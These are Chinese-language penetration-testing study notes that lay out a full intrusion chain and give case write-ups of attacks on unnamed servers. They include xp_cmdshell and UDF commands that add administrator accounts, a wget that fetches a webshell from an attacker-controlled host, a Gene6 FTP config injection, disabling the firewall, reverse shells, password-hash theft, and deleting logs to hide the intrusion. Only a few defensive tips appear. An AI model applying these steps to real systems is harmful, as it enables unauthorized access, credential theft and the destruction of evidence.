安全之路---渗透测试学习笔记1

渗透思路总结：通过sql注入xss注入社工库制作个人字典爆破等方式获取后台管理员账号密码--登上后台--上传木马得到webshell--利用各种方式提权--远程登录---下载SAMInside获取系统密码hash，通过彩虹表破解出密码明文--在目标机上利用Cain等工具继续进行内网渗透嗅探--清理痕迹（1.删掉新建的管理员用户  2.隐藏好免杀木马   3.删除日志文件）

进后台--传小马--上大马--提权限--偷密码--扫内网--清痕迹

 

学习笔记1 目录

·sql server2005提权

·Mysql数据库提权

···udf提权

···vbs启动项提权

···linux下的mysql提权

·Serv-U提权

·Pr提权

·通过信息泄露获取webshell

·远控软件radmin提权

·Gene6 ftp server本地提权

·渗透某培训服务器

·利用flash上传漏洞渗透某服务器

·由cuteeditor漏洞利用到全面控制服务器

·用户名注册+iis解析漏洞

·Dvbbs8.2插件上传漏洞利用研究

·利用cfm上传漏洞渗透某服务器

·ewebeditor编辑器漏洞攻击案例

 

 

·sql server2005提权

提权原理：需要拥有sa权限用户的密码，通过恢复xp_cmdshell储存过程执行cmd命令来提权。

提权过程：通过查看数据库链接文件获取数据库用户名，密码--登上数据库，执行sql添加xp_cmdshell----利用xp_cmdshell执行cmd命令添加计算机用户并加入管理员组

 

执行sql添加xp_cmdshell

Exec sp_configure ‘show advanced options’,1;RECONFIGURE;

Exec sp_configure ‘xp_cmdshell’,1;RECOONFIGURE;

 

利用xp_cmdshell添加用户

Exec master.dbo.xp_cmdshell ‘cmd命令’;

如

Exec master.dbo.xp_cmdshell ‘net user abc1111... /add’;

Exec master.dbo.xp_cmdshell ‘net localgroupadministrators abc /add’;

 

 

 

 

 

PS：·udf提权要建立在拥有Mysql管理员权限（可写）且udf.dll文件导出成功的前提之下，而目前很多防御都阻止了udf.dll的导出。

·vbs写入内容分析：1.创建wshshell  2.执行cmd命令

set wshshell=createobject(“wscript.shell”);

Wshshell.run(“cmd.exe /c cmd命令”,0);

 

udf提权过程示例：先上传好udf提权的大马--连库---将udf.dll导出到肉机并创建shell函数---利用shell函数执行cmd命令进行添加管理员用户提权

 

 

·Serv-U提权

利用大马中的Serv-U提权功能模块进行提权

PS

·特别是通过asp的webshell提权时，必须进入serv-u真是路径，提权才会成功

·serv-u7.0以后的版本提权相对困难

·如果可以查看serv-u配置文件，那么还可以通过破解serv-u用户密码进行提权

防御：

1.对serv-u进行降权处理

2.升级版本

 

 

 

 

··通过webshell大马的功能模块来直接提权

····Mysql udf提权

····Serv-U提权

 

 

·Pr提权

得到webshell后上传pr提权工具进行提权即可

Ps：

·可利用webshell通过查看进程的方式来获取进程程序相关的文件的路径

·可通过NC抓包提交等方法来上传网马

·华众管理系统（HZHOST）的安装文件下有个site.mdb，site.mdb中有site，sqlseting和vhostseting三个表，各个表存储信息

Site表：站点名称，ftp用户名密码，站点所在目录

Sqlseting表：保存的是sa和root用户的密码

Vhostseting表：保存的是虚拟机的管理信息

 

 

·通过信息泄露获取webshell

攻击者:www.somesite.com

目标机www.xx.com

 

利用前人留下的webshell---如何找到前人webshell地址？---通过查看tomcat状态查看运行情况，即查看http://www.xx.com/status----得到一个只可以执行cmd命令的shell，很不方便，想办法上传一个好用的大马---先上传一个txt格式的jsp文件（Browser.txt）到自己的服务器www.somesite.com/Browser.txt上----再在前人留下的cmd shell上执行  wgethttp://www.somesite.com/Browser.txt  将该文件下载到肉机上，再用

cp Browser.txt/opt/jboss/server/default/zmeu.war/2.jsp 把webshell文件复制到网站目录即可

 

 

·远控软件radmin提权

利用前提：知道安装了radmin服务端的ip，端口及密码，且没有做ip限制

利用：

1.远程计算机的md5 hash保存在注册表中Radmin键值下的Parameter中

2.通过webshell或sql注入，xss注入等方式查看注册表来获取md5hash

3.用Radmin-hash客户端登录，获得telnet--传工具上去获取肉机系统用户密码，远程登录

 

防范：

1.在Radmin服务端中进行授权设置。对登录的用户进行不同的权限的授予

2.使用ip限制

3.使用radmin中的日志记录

4.定期打补丁改密码

 

 

·Gene6 ftp server本地提权

漏洞原理：Gene6 ftp server默认安装后，本地的非特权用户可以修改Gene6 ftp server的设置，如添加新的site命令。由于Gene6 ftp server是以system权限运行的，因此攻击者可以轻易的提权。

前提：得到一个ftp用户的账号密码，此处设为得到的ftp用户的用户名为test

漏洞利用方式：

用test登录ftp---找到\Gene6 ftp server\Accounts\test\users\ 下的test.ini文件，插入一句

SiteCommandList0=-1，hack，C:\RECYCLER\1.bat,0,60,0,0,hack

(这里其实是做了映射，将1.bat映射到新建的site命令)

--用test用户登上ftp并执行命令

ftp>quote site hack

（前提是已经在C：\RECYCLER 目录下上传了一个用于添加用户的1.bat命令，而执行

quote site hack其实就是相当于执行1.bat文件，所以此时如果执行成功，那么就已经提权好了）

-----可以进一步进行ftp管理员提权，可在远程登录肉机，找到ftp下的user.ini文件查看ftp管理员密码hash并破解

 

防范：

1升级版本

2对程序进行降权处理，如只允许普通ftp用户读取*.ini配置文件，而不允许他们修改

 

 

·得到webshell后进行linux提权常用思路

1.查看linux内核版本 uname -a

2.查看操作系统发行版本 cat/etc/issue

3.上传相应的溢出程序

4.上传反弹shell，并执行上传好的exploit进行提权

找漏洞--得webshell--看版本--选溢出--提权限

 

 

·渗透某培训服务器

Sql注入得管理员密码--登上后台--上传大马--serv-u提权并创建管理员用户---远程登录--下载SAMInside抓取系统密码hash，并用Ophcrack破解hash得到系统用户密码---删除痕迹（1.删掉新建的管理员用户  2.隐藏木马   3.删除日志文件）

 

 

·利用flash上传漏洞渗透某服务器

弱口令登上后台--在综合管理模块找到“flash滚动展示设置”上找到一个上传点---可直接上传asp大马---用大马中的serv-u提权---远程登录---在目标机上安装Cain进行嗅探进一步渗透内网或者附近的服务器

 

 

·由cuteeditor漏洞利用到全面控制服务器

扫后台--社工找密码登录--因后台无法上传木马，于是选择旁注---反查域名，获取该服务器上其他的域名---扫相邻网站漏洞--发现可以sql注入---通过数字+字母类型报错，将url中？id=1022 改为  ？Id=102222222222aaaaaaaaaaaabbbbb  ，报错，爆出数据库类型为

microsoft sql server  推知为windows系统---用pangolin注入失败---换思路-----回到登录的后台---发现有个文章编辑器，有个插入媒体的按钮，点击后弹出一个“insert media”对话框--此对话框中找到一个可用于新建一个文件夹的按钮---尝试新建一个名为“simeon.asp”的文件夹，成功（此时思路便是利用iis解析漏洞）---把asp.net与asp的小马均上传上去，发现asp小马可用--继续上传大马---发现装了serv-u用大马直接提权

 

·用户名注册+iis解析漏洞

的目的

防范：

1.对注册的用户名称进行限制。排除带有*.asp *.asa  等字符为名的注册名

2.阻止用户对文件夹进行重命名操作

3.将uploads/ 目录的执行权限设为无

4.取消新建文件夹的权限

 

·Dvbbs8.2插件上传漏洞利用研究

Google搜索”Powered By DvbbsVersion 8.2.0”获取使用Dvbbs8.2的论坛---注册用户并进行基本设置---找到  文件管理  相关的地方 并找上传点 ---上传1.asp;1.jpg  利用iis解析漏洞----使用浏览器下载功能下载数据库（如果数据库地址中有  #   要在下载的url中把#改为%23才能下载成功）

·利用cfm上传漏洞渗透某服务器

Sql注入得到后台密码----进后台----上传一个cfm命令执行webshell（相当于反弹了一个shell）----开了3389但外部无法访问----停用防火墙   net stop sharedaccess  ----lcx转发端口实现远程登录----上传saminiside获取系统密码hash，彩虹表破hash---上传cain进行内网渗透嗅探

 

.

·ewebeditor编辑器漏洞攻击案例

漏洞原理：

 

 

 

 

 

利用思路：据图片属性地址中含有 ewebeditor  怀疑使用了ewebeditor编辑器---直接访问ewebeditor默认数据库文件地址，将数据库下载到本地---从数据库中找到管理员密码---登上后台---修改上传文件类型（加上 | asp）--上传asp网马（进一步可以查看网马权限，若为system权限可以添加一个管理员账户----远程登录---获取目标机系统密码---删除痕迹）

 

 

但若为ISP提供商提供的服务器则一般安全性比较高，比较难以进一步渗透

 

 

 

Tips:

·windows Server 2008系统对用户密码有强度要求，必须具备一定的复杂性才能添加成功。

·拥有系统权限和管理员权限时都可以添加一个新的用户并将其加入到管理员组